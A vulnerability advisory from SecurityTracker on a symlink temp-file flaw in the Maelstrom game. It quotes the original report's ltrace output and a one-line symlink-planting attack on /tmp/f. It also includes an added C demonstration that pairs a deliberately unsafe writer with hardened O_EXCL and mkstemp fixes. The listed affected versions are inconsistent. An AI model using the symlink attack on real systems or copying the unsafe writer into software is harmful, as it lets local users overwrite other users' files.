SecurityTracker.com

SecurityTracker
Archives




Category:   Application (Game)  >   Maelstrom
Vendors:   Lantinga, Sam
Maelstrom Game Temporary File Symbolic Link Flaw Lets Local Users Cause Files on the System to Be Overwritten
SecurityTracker Alert ID:  1003317
SecurityTracker URL:  http://securitytracker.com/id/1003317
CVE Reference:   GENERIC-MAP-NOMATCH
Updated:  Jan 22 2002
Original Entry Date:  Jan 22 2002
Impact:   Modification of system information, Modification of user information
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 3.0.1
Description:   A temporary file symbolic link vulnerability was reported in the Maelstrom game. A local user may be able to cause files to be overwritten on the system.

It is reported that Maelstrom writes a temporary file under a fixed, predictable name (the report shows /tmp/f) and does not check for an existing symbolic link (symlink) at that path before opening it for writing. A local user can create a symlink from the temporary file name to another file on the system. When another user then runs Maelstrom, the game opens the path, follows the link, and truncates and overwrites the linked file with the privileges of that user, so any file the victim user can write to is reachable.
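The pattern the description refers to, shown as an added example (this is not Maelstrom's code and is not from the advisory or the report): a writer that mirrors the fopen("/tmp/f", "w") call from the ltrace output, beside two hardened versions, followed by a self-contained reproduction that plants a symlink at the predictable name and runs each writer against it. Function names, the scratch directory, the "victim" file and its contents are constructed for the demonstration.

```c
#define _GNU_SOURCE   /* O_NOFOLLOW, mkdtemp(), mkstemp(), symlink() */
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Vulnerable pattern, mirroring the fopen("/tmp/f", "w") in the ltrace output:
 * a fixed, predictable path opened for writing.  fopen() follows a symlink
 * already at that path, so its target is truncated and rewritten as the caller. */
int write_status_unsafe(const char *path, const char *program)
{
    FILE *f = fopen(path, "w");
    if (f == NULL) return -1;
    fprintf(f, "Main program = %s\n", program);
    return fclose(f);
}

/* Shared tail for the hardened variants: adopt an open descriptor, write, close. */
static int put_status(int fd, const char *program)
{
    FILE *f = fdopen(fd, "w");
    if (f == NULL) { close(fd); return -1; }
    fprintf(f, "Main program = %s\n", program);
    return fclose(f);
}

/* Hardened, fixed name: O_CREAT|O_EXCL fails with EEXIST if anything (a symlink
 * included) already exists at path, and O_NOFOLLOW refuses a symlink in the
 * final component.  A planted link is rejected, never written through. */
int write_status_safe(const char *path, const char *program)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
    return fd < 0 ? -1 : put_status(fd, program);
}

/* Hardened, unpredictable name: mkstemp() picks a random suffix and opens with
 * O_EXCL in one step; the chosen path is written back into tmpl ("...XXXXXX"). */
int write_status_mkstemp(char *tmpl, const char *program)
{
    int fd = mkstemp(tmpl);
    return fd < 0 ? -1 : put_status(fd, program);
}

/* First line of path into buf; 0 on success, -1 if unreadable. */
static int first_line(const char *path, char *buf, size_t n)
{
    FILE *f = fopen(path, "r");
    if (f == NULL) return -1;
    if (fgets(buf, (int)n, f) == NULL) buf[0] = '\0';
    return fclose(f);
}

/* Writes the constructed victim's original content ("bla\n") directly to path. */
static int reset_victim(const char *path)
{
    FILE *v = fopen(path, "w");
    if (v == NULL) return -1;
    fputs("bla\n", v);
    return fclose(v);
}

/* Reproduces the report inside a private mkdtemp() directory, so the result does
 * not depend on whatever symlink restrictions the real /tmp enforces: a victim
 * file, a symlink at the predictable name pointing at it, then each writer.
 * Returns a bitmask, expected value 7:
 *   bit 0: unsafe writer clobbered victim through the link
 *   bit 1: safe writer failed with EEXIST, victim intact
 *   bit 2: mkstemp writer made a fresh file, victim still intact */
int run_symlink_demo(void)
{
    char dir[] = "/tmp/symdemo.XXXXXX";
    char victim[300], link[300], tmpl[300], buf[128];
    const char *want = "Main program = Maelstrom\n";
    int result = 0;
    if (mkdtemp(dir) == NULL) return -1;
    snprintf(victim, sizeof victim, "%s/victim", dir);
    snprintf(link, sizeof link, "%s/f", dir);           /* stands in for /tmp/f */
    snprintf(tmpl, sizeof tmpl, "%s/f.XXXXXX", dir);
    if (reset_victim(victim) != 0 || symlink(victim, link) != 0) return -1;

    if (write_status_unsafe(link, "Maelstrom") == 0 &&
        first_line(victim, buf, sizeof buf) == 0 && strcmp(buf, want) == 0)
        result |= 1;

    if (reset_victim(victim) != 0) return -1;
    errno = 0;
    if (write_status_safe(link, "Maelstrom") == -1 && errno == EEXIST &&
        first_line(victim, buf, sizeof buf) == 0 && strcmp(buf, "bla\n") == 0)
        result |= 2;

    if (write_status_mkstemp(tmpl, "Maelstrom") == 0 &&
        first_line(tmpl, buf, sizeof buf) == 0 && strcmp(buf, want) == 0 &&
        first_line(victim, buf, sizeof buf) == 0 && strcmp(buf, "bla\n") == 0)
        result |= 4;

    unlink(tmpl); unlink(link); unlink(victim); rmdir(dir);
    return result;
}

int main(void) { printf("demo result: %d (expected 7)\n", run_symlink_demo()); return 0; }
```

Build with `cc -o symdemo symdemo.c && ./symdemo`. The unsafe writer returns success while the victim's contents change, which is exactly what the report's `cat /tmp/bla` shows; the O_EXCL writer returns -1 with errno EEXIST and the victim is untouched, and the mkstemp writer never touches the attacker-chosen name at all. For output nobody consumes, the reporter's suggestion to delete the write entirely is the simplest fix of the three.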

Impact:   A local user can cause certain files to be overwritten when another user runs the Maelstrom game.
Solution:   The vendor has fixed the vulnerability in the current version (3.0.5), available at:

http://www.devolution.com/~slouken/Maelstrom/binary.html

Vendor URL:  www.devolution.com/~slouken/Maelstrom/
Cause:   Access control error, State error
Underlying OS:  Linux (Any), UNIX (Any)
Underlying OS Comments:  Tested on Red Hat Linux 7.1

Message History:   None.


Source Message Contents

Subject:  Maelstrom 1.4.3 arbitrary file overwrite


Program: Maelstrom
Version: 1.4.3
Distribution: RedHat 7.1

When trying to break stuff, ltracing Maelstrom showed the following:

fopen("/tmp/f", "w")                              = 0x08081f58
fprintf(0x08081f58, "Main program = %s\n", "Maelstrom") = 25
fclose(0x08081f58)                                = 0

Which made me wonder whether it followed symbolic links, by doing

[andrewg@blackhole andrewg]$ rm -f /tmp/f; (umask 077; echo bla > /tmp/bla; \
ln -s /tmp/bla /tmp/f)

at which point I ran it again, and when I did cat /tmp/bla, I got

Main program = Maelstrom

Conclusion:
-=-=-=-=-=-

You can overwrite arbitrary files with the permissions of the user who ran
it.

Of course, this won't work on systems that have linking restrictions in /tmp.

Fixing it
-=-=-=-=-

Remove the code that does the above.


--
www.tasmail.com











Copyright 2019, SecurityGlobal.net LLC